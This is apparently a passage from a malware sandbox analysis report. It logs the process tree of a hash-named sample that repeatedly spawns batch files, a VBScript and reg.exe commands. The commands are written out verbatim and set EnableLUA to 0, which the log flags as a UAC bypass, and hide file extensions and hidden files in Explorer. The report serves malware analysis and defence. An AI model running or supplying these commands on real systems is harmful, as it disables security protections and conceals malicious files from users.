reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
118⤵
PID:3924

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OosMcUQY.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
118⤵
PID:2948

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
119⤵
PID:824

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
116⤵
- Modifies visibility of file extensions in Explorer
PID:768

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
116⤵
PID:1452

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
116⤵
PID:1408

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KcwYQUcA.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
116⤵
PID:932

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
117⤵
PID:4740

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
114⤵
PID:1620

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
114⤵
- Modifies registry key
PID:1316

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
114⤵
- UAC bypass
PID:2584

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ykAgkUoM.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
114⤵
PID:3508

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
115⤵
PID:2340

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
112⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:1100

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
112⤵
- Modifies registry key
PID:2220

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
112⤵
PID:2348

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UiYsMwgw.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
112⤵
PID:3268

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
113⤵
PID:4720

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
110⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:2012

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
110⤵
PID:3040

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
110⤵
PID:5628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nAEQUscA.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
110⤵
PID:704

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
111⤵
PID:3972

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
108⤵
PID:2616

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
108⤵
PID:5500

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
108⤵
- UAC bypass
PID:3056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TOsscEEc.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
108⤵
PID:2912

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
109⤵
PID:5828

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
106⤵
- Modifies visibility of file extensions in Explorer
PID:1512

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
106⤵
PID:5044

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
106⤵
- Modifies registry key
PID:4984

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ROEAUUcA.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
106⤵
PID:5908

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
107⤵
PID:2424

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
104⤵
PID:4936

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
104⤵
PID:1088

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
104⤵
PID:3764

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BokUkYok.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
104⤵
PID:3336

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
105⤵
PID:1500

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
102⤵
- Modifies visibility of file extensions in Explorer
PID:2904

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
102⤵
PID:764

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
102⤵
- UAC bypass
PID:5544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DKcYIccs.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
102⤵
PID:1312

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
103⤵
PID:3984

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
100⤵
PID:2124

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
100⤵
- Modifies registry key
PID:5732

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
100⤵
PID:6012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sQIYgEcI.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
100⤵
PID:4256

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
101⤵
PID:4072

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
98⤵
PID:5600

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
98⤵
PID:1404

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
98⤵
PID:2028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OOcMQgUk.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
98⤵
PID:2024

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
99⤵
PID:5792

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
96⤵
PID:3716

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
96⤵
PID:3448

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
96⤵
- UAC bypass
PID:2824

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cWAAMsMI.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
96⤵
PID:5192

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
97⤵
PID:5888

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
94⤵
PID:5272

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
94⤵
PID:2704

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
94⤵
PID:5812

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QQQkEEUM.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
94⤵
PID:416

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
95⤵
PID:3528

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
92⤵
PID:4236

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
92⤵
PID:4736

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
92⤵
PID:2756

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jEEUAwcI.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
92⤵
PID:4504

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
93⤵
PID:5232

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
90⤵
- Modifies visibility of file extensions in Explorer
PID:4984

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
90⤵
PID:5208

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
90⤵
PID:3504

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pEQIYIUQ.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
90⤵
PID:5444

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
91⤵
PID:476

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
88⤵
PID:824

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
88⤵
PID:5516

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
88⤵
- UAC bypass
PID:1396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PYgIYoYU.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
88⤵
PID:5644

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
89⤵
PID:4548

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
86⤵
- Modifies registry key
PID:5344

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
86⤵
PID:236

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
86⤵
PID:1040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JkAkwUIw.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
86⤵
PID:3556

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
87⤵
PID:752

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
84⤵
- Modifies visibility of file extensions in Explorer
PID:788

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
84⤵
PID:2092

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
84⤵
PID:4496

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uWUkgAUQ.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
84⤵
PID:2204

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
85⤵
PID:3412

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
82⤵
PID:3144

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
82⤵
- Modifies registry key
PID:2472

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
82⤵
- UAC bypass
PID:1440

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GCUsAAYY.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
82⤵
PID:5040

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
83⤵
PID:4060

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
80⤵
PID:4140

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
80⤵
- Modifies registry key
PID:5268

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
80⤵
PID:3248

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UywwIcYQ.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
80⤵
PID:3968

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
81⤵
PID:2244

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
78⤵
PID:3580

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
78⤵
PID:4660

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
78⤵
PID:5812

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iMAcYoUY.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
78⤵
PID:3768

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
79⤵
PID:3136

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
76⤵
- Modifies visibility of file extensions in Explorer
PID:4992

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
76⤵
PID:2900

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
76⤵
PID:4776

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NmwMcokQ.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
76⤵
PID:5668

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
77⤵
PID:3916

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
74⤵
PID:5280

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
74⤵
- Modifies registry key
PID:1556

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
74⤵
PID:2772

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PiAAUwYo.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
74⤵
PID:3704

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
75⤵
PID:3380

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
72⤵
PID:5700

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
72⤵
- Modifies registry key
PID:5796

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
72⤵
- UAC bypass
PID:1456

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\boYgYYkI.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
72⤵
PID:2568

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
73⤵
PID:5676

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
70⤵
- Modifies visibility of file extensions in Explorer
PID:1840

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
70⤵
PID:2692

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
70⤵
- Modifies registry key
PID:3556

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nQUIoQcE.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
70⤵
PID:3924

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
71⤵
PID:3456

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
68⤵
- Modifies visibility of file extensions in Explorer
PID:5984

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
68⤵
- Modifies registry key
PID:6012

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
68⤵
- UAC bypass
- Modifies registry key
PID:3780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eIYQMoYo.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
68⤵
PID:940

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
69⤵
PID:3576

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
66⤵
PID:2340

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
66⤵
PID:1164

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
66⤵
PID:5024

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yusgUcQY.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
66⤵
PID:1156

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
67⤵
PID:5792

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
64⤵
PID:472

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
64⤵
PID:5324

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
64⤵
PID:5656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sewMUAss.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
64⤵
PID:2476

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
65⤵
PID:2348

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
62⤵
- Modifies visibility of file extensions in Explorer
PID:4116

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
62⤵
PID:5968

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
62⤵
- Modifies registry key
PID:800

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qcwwgQkA.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
62⤵
PID:5568

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
63⤵
PID:5396

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
60⤵
PID:5228

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
60⤵
PID:2448

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
60⤵
- UAC bypass
PID:2900

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nQsYIIYM.bat" "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe""
60⤵
PID:4684

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
